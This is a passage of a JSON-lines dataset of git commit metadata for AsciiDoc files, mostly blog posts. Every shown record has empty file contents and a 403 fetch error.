unable to access 'https:\/\/github.com\/fgracia\/fgracia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c78e55d05709a53e43453fefe854740dfe1a3e93","subject":"Update 2017-11-11-Dome.adoc","message":"Update 
2017-11-11-Dome.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-11-11-Dome.adoc","new_file":"_posts\/2017-11-11-Dome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a98aa061acc13b2636769047e930cd9bb6d4035","subject":"docs: remove extraneous space","message":"docs: remove extraneous space\n\nChange-Id: I0a2d4b6b8e5e09affc4c1a239e3a61d4c58a72f8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12906\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6160ba65a126f69b91c69a3c77918a0f16f4fd35","subject":"Update 2015-02-27-push-State-state-Obj.adoc","message":"Update 2015-02-27-push-State-state-Obj.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2015-02-27-push-State-state-Obj.adoc","new_file":"_posts\/2015-02-27-push-State-state-Obj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96e754fe8327ac7a177294acb3a039da81528ca6","subject":"Update 2015-09-26-Sort-Algorithms-Summary.adoc","message":"Update 2015-09-26-Sort-Algorithms-Summary.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Sort-Algorithms-Summary.adoc","new_file":"_posts\/2015-09-26-Sort-Algorithms-Summary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93812bf522d8658b0445d26deef0f37309b8aee5","subject":"Update 2016-04-02-ArduinoGenuino-Day-2016.adoc","message":"Update 2016-04-02-ArduinoGenuino-Day-2016.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-04-02-ArduinoGenuino-Day-2016.adoc","new_file":"_posts\/2016-04-02-ArduinoGenuino-Day-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83f57c1c4791534ddba241ec507e2a5ac7653af3","subject":"Update 
2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"429f181c7189bfb213c5b18b2d35a8264d0cb69a","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4504df693638d83b6d9c99707e5a9619fbe40d1a","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acf97688eddfb313bf242f406bc7f82c3501cb91","subject":"Update 2018-02-07-Screencasts-on-Linux-part-2.adoc","message":"Update 2018-02-07-Screencasts-on-Linux-part-2.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-02-07-Screencasts-on-Linux-part-2.adoc","new_file":"_posts\/2018-02-07-Screencasts-on-Linux-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3723e92465a24fc7aa51c716a6db2f16dde029e0","subject":"Update 2015-10-12-myblog.adoc","message":"Update 2015-10-12-myblog.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-myblog.adoc","new_file":"_posts\/2015-10-12-myblog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60f7d1643b966a0d9406ba4dd1eb1b3eb5517705","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 
2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57a7e5e2464166b7684e619b4fa34e94d46771fe","subject":"Update 2016-04-06-Setting-up-the-Sonar-Qube.adoc","message":"Update 2016-04-06-Setting-up-the-Sonar-Qube.adoc","repos":"mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io","old_file":"_posts\/2016-04-06-Setting-up-the-Sonar-Qube.adoc","new_file":"_posts\/2016-04-06-Setting-up-the-Sonar-Qube.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrcouthy\/mrcouthy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dae0f81938c9b49d90b5472fd3265fd87ec40a0","subject":"Update 2015-03-24-HTML-Button-mit-Klick-Effect-CSS-und-JavaScript.adoc","message":"Update 2015-03-24-HTML-Button-mit-Klick-Effect-CSS-und-JavaScript.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-03-24-HTML-Button-mit-Klick-Effect-CSS-und-JavaScript.adoc","new_file":"_posts\/2015-03-24-HTML-Button-mit-Klick-Effect-CSS-und-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d6d22ccfeba70a741a4c87a517391fa4ef6ab10","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef2697a6df51f3943b0ba95cff11e3f97621c408","subject":"Revert \"Delete the file at '_posts\/2019-01-31-draft-embedded-image.adoc'\"","message":"Revert \"Delete the file at '_posts\/2019-01-31-draft-embedded-image.adoc'\"\n\nThis reverts commit eca754ecdc01727a10d785dacbe28ed168a1e707.\n","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-draft-embedded-image.adoc","new_file":"_posts\/2019-01-31-draft-embedded-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c71a012ba4ad39639d6ea420230fb5b63ba697b5","subject":"Update 2016-07-20-vim.adoc","message":"Update 
2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f735c825b8ccf84aba4ae5bce7be50315cbeb699","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7503e3995cd891e2989c2086968915d52a8433eb","subject":"Update 2017-05-29-Migrate-Windows-VM-to-PVE.adoc","message":"Update 2017-05-29-Migrate-Windows-VM-to-PVE.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-05-29-Migrate-Windows-VM-to-PVE.adoc","new_file":"_posts\/2017-05-29-Migrate-Windows-VM-to-PVE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c031938f56f43af2d0a5ba291688453ddadd7969","subject":"Update 2020-05-19-ffmpeg-convert-mp3-to-wav.adoc","message":"Update 2020-05-19-ffmpeg-convert-mp3-to-wav.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2020-05-19-ffmpeg-convert-mp3-to-wav.adoc","new_file":"_posts\/2020-05-19-ffmpeg-convert-mp3-to-wav.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"965772e8eb4a4296ab1ffd7625a6b0ffea44d91a","subject":"tuned events section","message":"tuned events section\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80c923ed72cdb1b69290742a3bec379947707e86","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"ca3324dc66fd0ec7aceef813f736ca4740482c01","subject":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","message":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c15d2bc428f2d2b248d36ab7b574d675d6cccf6c","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7af43fbf5145c17e5e0f601c84e2e65367361a05","subject":"added jeeconf link","message":"added jeeconf link\n","repos":"tsypuk\/springrestdoc","old_file":"restdocs\/src\/docs\/asciidoc\/etc\/jeeconf.adoc","new_file":"restdocs\/src\/docs\/asciidoc\/etc\/jeeconf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tsypuk\/springrestdoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b2dbbffac73f8452da2fe54ff4bdd85e5261f30","subject":"Update 2017-08-24-New-web-application-with-Google-Firebase-and-reactjs.adoc","message":"Update 2017-08-24-New-web-application-with-Google-Firebase-and-reactjs.adoc","repos":"cmolitor\/blog,cmolitor\/blog,cmolitor\/blog,cmolitor\/blog","old_file":"_posts\/2017-08-24-New-web-application-with-Google-Firebase-and-reactjs.adoc","new_file":"_posts\/2017-08-24-New-web-application-with-Google-Firebase-and-reactjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmolitor\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"822b61f0765de45e743520d542644fc4f545e2c6","subject":"Update 2016-09-innovation-engineer-aruaru.adoc","message":"Update 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"764f5ed5689f6146a46cf9ff07283938a126725f","subject":"Update 2015-05-14-test.adoc","message":"Update 
2015-05-14-test.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-test.adoc","new_file":"_posts\/2015-05-14-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ff716e723a393c547284ae69bd21838a831fbbb","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ac88e2cdb33d1768a75ffaf6363a321964251ee","subject":"y2b create post Unboxing LEGO Dimensions!","message":"y2b create post Unboxing LEGO Dimensions!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-04-Unboxing-LEGO-Dimensions.adoc","new_file":"_posts\/2015-10-04-Unboxing-LEGO-Dimensions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"898141f2b657741dd69a7f717a249c6f08fd3e7a","subject":"y2b create post Unboxing The Sony A7R II","message":"y2b create post Unboxing The Sony A7R II","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-23-Unboxing-The-Sony-A7R-II.adoc","new_file":"_posts\/2015-11-23-Unboxing-The-Sony-A7R-II.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fd25053aced6198a15d3ce0bff211eb60d9fc64","subject":"WhoAmI","message":"WhoAmI\n","repos":"verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works,mygithubwork\/boot-works","old_file":"security.adoc","new_file":"security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d5cca0caf87efe37395e40478fb909c650e5fc9","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 
2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0284c89b628a17e788ee79b09103a980a0c4337f","subject":"Update 2017-07-13-Lone-Star-Masonry-Special-Guest-Robert-Marshall.adoc","message":"Update 2017-07-13-Lone-Star-Masonry-Special-Guest-Robert-Marshall.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-07-13-Lone-Star-Masonry-Special-Guest-Robert-Marshall.adoc","new_file":"_posts\/2017-07-13-Lone-Star-Masonry-Special-Guest-Robert-Marshall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7296dc53d41c728ead4f493911d66172420117b4","subject":"y2b create post OnePlus 5T Limited Edition Unboxing + Easter Egg","message":"y2b create post OnePlus 5T Limited Edition Unboxing + Easter Egg","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-20-OnePlus-5T-Limited-Edition-Unboxing--Easter-Egg.adoc","new_file":"_posts\/2017-12-20-OnePlus-5T-Limited-Edition-Unboxing--Easter-Egg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f248e475f72422530a625bc26405751a971b8b5","subject":"readme for lab 6","message":"readme for lab 6\n","repos":"toedter\/webapp-tutorial,toedter\/webapp-tutorial,toedter\/webapp-tutorial,toedter\/webapp-tutorial","old_file":"lab6\/initial\/README.adoc","new_file":"lab6\/initial\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/toedter\/webapp-tutorial.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db60bc81d3b359613306b9e7323f70cb1da9ad16","subject":"Update 2015-10-01-coffee_and_blackmoney.adoc","message":"Update 2015-10-01-coffee_and_blackmoney.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-01-coffee_and_blackmoney.adoc","new_file":"_posts\/2015-10-01-coffee_and_blackmoney.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f2a2de780ae230bd20cbe65f099ed8403f7eefd","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 
2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f8c67b69577e1c00d08f009fd84844a34c1f59b","subject":"y2b create post Galaxy S7 - 16 Hours In Water","message":"y2b create post Galaxy S7 - 16 Hours In Water","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-01-Galaxy-S7--16-Hours-In-Water.adoc","new_file":"_posts\/2016-04-01-Galaxy-S7--16-Hours-In-Water.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cd32a16eac19d4341dcc6b3980ae5b332553587","subject":"Update 2018-12-25-Akamai-Site-Shield-Terraform.adoc","message":"Update 2018-12-25-Akamai-Site-Shield-Terraform.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-25-Akamai-Site-Shield-Terraform.adoc","new_file":"_posts\/2018-12-25-Akamai-Site-Shield-Terraform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f39e2307dde10a8e698f274c4b8e36ec03341aef","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f7f263e5f531cc4a220ea8c2c73eaddeeacab2b","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b77781cf3cc910842006d05260d3339fa8cd58d","subject":"Update 2019-01-31-Pwnablekr-UAF-Writeup.adoc","message":"Update 
2019-01-31-Pwnablekr-UAF-Writeup.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2019-01-31-Pwnablekr-UAF-Writeup.adoc","new_file":"_posts\/2019-01-31-Pwnablekr-UAF-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2f79c58685179a6a6dc3cdad9b189a582f38c01","subject":"Update 2016-11-07-180000-Monday-Workday.adoc","message":"Update 2016-11-07-180000-Monday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-180000-Monday-Workday.adoc","new_file":"_posts\/2016-11-07-180000-Monday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c81857e4ee8cd939577671d7a438d12a2c9e66de","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddb9cfaf4b31740882ddce3e1671d9d5e050ac4a","subject":"Added wafle.io badge","message":"Added wafle.io 